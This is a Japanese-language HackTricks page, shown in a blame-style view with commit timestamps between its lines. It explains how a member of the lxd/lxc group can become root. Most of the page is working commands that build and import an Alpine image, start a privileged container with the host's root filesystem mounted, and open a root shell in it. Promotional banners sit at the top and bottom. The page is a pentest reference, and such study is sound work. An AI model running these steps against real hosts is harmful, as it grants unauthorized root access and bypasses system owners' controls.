2022-04-28 16:01:33 +00:00
< details >
2024-01-06 23:47:16 +00:00
< summary > < strong > AWSハッキングをゼロからヒーローまで学ぶには< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > をチェック!< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-01-06 23:47:16 +00:00
HackTricksをサポートする他の方法:
2022-04-28 16:01:33 +00:00
2024-01-06 23:47:16 +00:00
* **HackTricksにあなたの会社を広告したい場合**や**HackTricksをPDFでダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください。
* [**公式PEASS & HackTricksグッズ** ](https://peass.creator-spring.com )を入手する
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックする
* 💬 [**Discordグループ** ](https://discord.gg/hRep4RUj7f )や[**テレグラムグループ**](https://t.me/peass)に**参加する**か、**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/carlospolopm )で**フォローする**。
* [**HackTricks** ](https://github.com/carlospolop/hacktricks )と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングテクニックを**共有する**。
2022-04-28 16:01:33 +00:00
< / details >
2024-01-06 23:47:16 +00:00
_**lxd**_ **または** _**lxc**_ **グループに属している場合** 、rootになることができます。
2020-07-15 15:43:14 +00:00
2024-01-06 23:47:16 +00:00
# インターネットなしでの悪用
2020-07-15 15:43:14 +00:00
2024-01-06 23:47:16 +00:00
あなたのマシンにこのディストリビューションビルダーをインストールできます: [https://github.com/lxc/distrobuilder ](https://github.com/lxc/distrobuilder )\(githubの指示に従ってください):
2020-08-10 09:55:03 +00:00
```bash
2020-07-15 15:43:14 +00:00
#Install requirements
sudo apt update
sudo apt install -y golang-go debootstrap rsync gpg squashfs-tools
#Clone repo
2020-08-10 09:55:03 +00:00
go get -d -v github.com/lxc/distrobuilder
2020-07-15 15:43:14 +00:00
#Make distrobuilder
cd $HOME/go/src/github.com/lxc/distrobuilder
make
cd
#Prepare the creation of alpine
mkdir -p $HOME/ContainerImages/alpine/
cd $HOME/ContainerImages/alpine/
2020-08-09 13:31:57 +00:00
wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml
2020-07-15 15:43:14 +00:00
#Create the container
2020-08-09 13:31:57 +00:00
sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml
2020-07-15 15:43:14 +00:00
```
2024-01-06 23:47:16 +00:00
次に、サーバーに**lxd.tar.xz**と**rootfs.squashfs**のファイルをアップロードします。
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
イメージを追加します:
2020-08-10 09:55:03 +00:00
```bash
2020-07-15 15:43:14 +00:00
lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
lxc image list #You can see your new imported image
```
2024-01-06 23:47:16 +00:00
コンテナを作成し、ルートパスを追加する
2020-08-10 09:55:03 +00:00
```bash
2020-07-15 15:43:14 +00:00
lxc init alpine privesc -c security.privileged=true
lxc list #List containers
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
```
2024-01-06 23:47:16 +00:00
コンテナを実行する:
2020-08-10 09:55:03 +00:00
```bash
2020-08-09 13:46:52 +00:00
lxc start privesc
2020-07-15 15:43:14 +00:00
lxc exec privesc /bin/sh
2020-08-10 09:55:03 +00:00
[email protected]:~# cd /mnt/root #Here is where the filesystem is mounted
2020-07-15 15:43:14 +00:00
```
2024-01-06 23:47:16 +00:00
# インターネットあり
2020-07-15 15:43:14 +00:00
2024-01-06 23:47:16 +00:00
[これらの指示 ](https://reboare.github.io/lxd/lxd-escape.html )に従うことができます。
2020-08-10 09:55:03 +00:00
```bash
2020-07-15 15:43:14 +00:00
lxc init ubuntu:16.04 test -c security.privileged=true
2023-07-07 23:42:27 +00:00
lxc config device add test whatever disk source=/ path=/mnt/root recursive=true
2020-07-15 15:43:14 +00:00
lxc start test
lxc exec test bash
2020-08-10 09:55:03 +00:00
[email protected]:~# cd /mnt/root #Here is where the filesystem is mounted
2020-07-15 15:43:14 +00:00
```
2023-07-07 23:42:27 +00:00
# その他の参考資料
2020-07-15 15:43:14 +00:00
2020-08-10 09:55:03 +00:00
{% embed url="https://reboare.github.io/lxd/lxd-escape.html" caption="" %}
2020-07-15 15:43:14 +00:00
2022-04-28 16:01:33 +00:00
< details >
2024-01-06 23:47:16 +00:00
< summary > < strong > AWSハッキングをゼロからヒーローまで学ぶには< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > をチェック!< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-01-06 23:47:16 +00:00
HackTricksをサポートする他の方法:
2022-04-28 16:01:33 +00:00
2024-01-06 23:47:16 +00:00
* **HackTricksにあなたの会社を広告掲載したい場合**や**HackTricksをPDFでダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ** ](https://peass.creator-spring.com )を入手する
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックする
* 💬 [**Discordグループ** ](https://discord.gg/hRep4RUj7f )に**参加する**か、[**テレグラムグループ**](https://t.me/peass)に参加する、または**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/carlospolopm )を**フォローする**。
* [**HackTricks** ](https://github.com/carlospolop/hacktricks )と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する。
2022-04-28 16:01:33 +00:00
< / details >